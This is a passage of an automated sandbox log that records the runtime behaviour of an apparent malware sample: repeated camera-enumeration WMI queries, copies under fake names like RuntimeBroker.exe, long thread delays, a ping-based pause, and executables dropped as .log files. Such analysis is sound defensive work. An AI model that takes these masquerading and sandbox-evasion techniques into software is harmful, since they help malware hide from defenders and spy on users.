Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: 2CF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 15C0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B030000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: BB0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1A810000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 15E0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1B4A0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1A610000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: F50000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AC50000 memory reserve | memory write watch
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1080000 memory reserve | memory write watch
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AE30000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: DC0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1ABA0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1910000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B390000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: C90000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1AA00000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: BF0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1720000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Memory allocated: 1B1F0000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 2F00000 memory reserve | memory write watch
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Memory allocated: 1B010000 memory reserve | memory write watch
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 19_2_00007FFD9B8C8355 sldt word ptr [eax] 19_2_00007FFD9B8C8355
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597229
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 597094
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596969
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596794
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 596617
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 599853
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 3600000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598907
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598203
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 598000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597344
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 597094
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596938
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596766
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596640
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596531
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596422
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596259
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 596107
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 300000
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595954
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595828
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595580
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595140
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 595014
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594906
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594563
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594438
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594313
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594198
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 594078
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593969
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593844
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593735
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593250
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 593141
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592985
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592846
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592719
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592610
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592485
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592375
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592266
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592157
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 592032
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591903
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591797
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591688
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591578
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591468
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591360
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591235
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 591110
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Window / User API: threadDelayed 3866
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Window / User API: threadDelayed 1627
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 437
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 367
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window / User API: threadDelayed 4252
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window / User API: threadDelayed 5368
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hSShNgSi.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yzZxaXSF.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eSWSCFMK.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NWsvAoLz.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nweImycr.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VRHDyDUj.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\quERYeDq.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fAbTigaR.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ekLJkSsv.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wHsyCTFf.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LionObPB.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EkAnmMVM.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rrfZteSl.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZpKsdnCB.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GNRoGDmH.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kdoiNyxj.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QwkEqgro.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HScOGmcH.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BazpdGXT.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DEgxfiAU.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cnkBPSdA.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ndjISZpy.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JNNDResf.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wexYWbhZ.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NEEtYbtY.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\IhtNKAXm.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WoNdSLwd.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oQGhqvNX.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UMwcyUfj.log
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BuKwfPUT.log
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99883s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99657s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99544s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99199s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -99084s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98954s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98829s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98704s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98579s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98454s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98329s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98204s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -98094s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -97954s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -597229s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596969s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596794s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944 Thread sleep time: -596617s >= -30000s
Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6280 Thread sleep time: -30000s >= -30000s
